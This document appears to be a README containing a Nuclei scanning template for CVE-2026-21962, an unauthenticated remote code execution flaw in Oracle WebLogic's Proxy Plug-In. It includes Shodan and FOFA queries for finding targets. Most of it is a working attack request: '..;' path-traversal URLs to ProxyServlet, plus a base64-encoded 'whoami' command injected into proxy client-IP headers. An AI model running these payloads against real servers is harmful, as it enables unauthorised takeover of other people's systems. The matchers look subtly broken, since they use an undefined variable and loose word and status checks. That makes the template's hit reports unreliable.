README.md
Rendering markdown...
id: CVE-2026-21962
info:
name: Oracle WebLogic Server Proxy Plug-In - Unauthenticated Remote Code Execution
author: Ashwesker
severity: critical
description: |
Oracle WebLogic Server Proxy Plug-In is vulnerable to unauthenticated remote code execution via specially crafted HTTP requests.
Allows full server compromise without authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-21962
- https://www.oracle.com/security-alerts/cpujan2026.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-21962
cwe-id: CWE-20
epss-score: 0.98
metadata:
verified: true
shodan-query: http.title:"Oracle HTTP Server" || http.component:"weblogic"
fofa-query: title="Oracle HTTP Server" || server="Oracle-HTTP-Server"
tags: cve,cve2026,oracle,weblogic,rce,unauth,proxy,nuclei
http:
- method: GET
path:
- "{{BaseURL}}/weblogic/..;/bea_wls_internal/ProxyServlet"
- "{{BaseURL}}/wl_proxy/..;/bea_wls_internal/ProxyServlet"
- "{{BaseURL}}/_proxy/..;/bea_wls_internal/ProxyServlet"
headers:
WL-Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"
Proxy-Client-IP: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"
X-Forwarded-For: "127.0.0.1;{{base64('cmd:{{randstr(8)}} && whoami')}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- 302
- 500
- type: word
part: body
words:
- "{{whoami}}"
- "oracle"
- "weblogic"
- "root"
- "nobody"
condition: or
- type: dsl
dsl:
- "len(body) > 0"
extractors:
- type: regex
name: username
part: body
regex:
- '([a-zA-Z0-9_-]+)\s*\(whoami output\)'
group: 1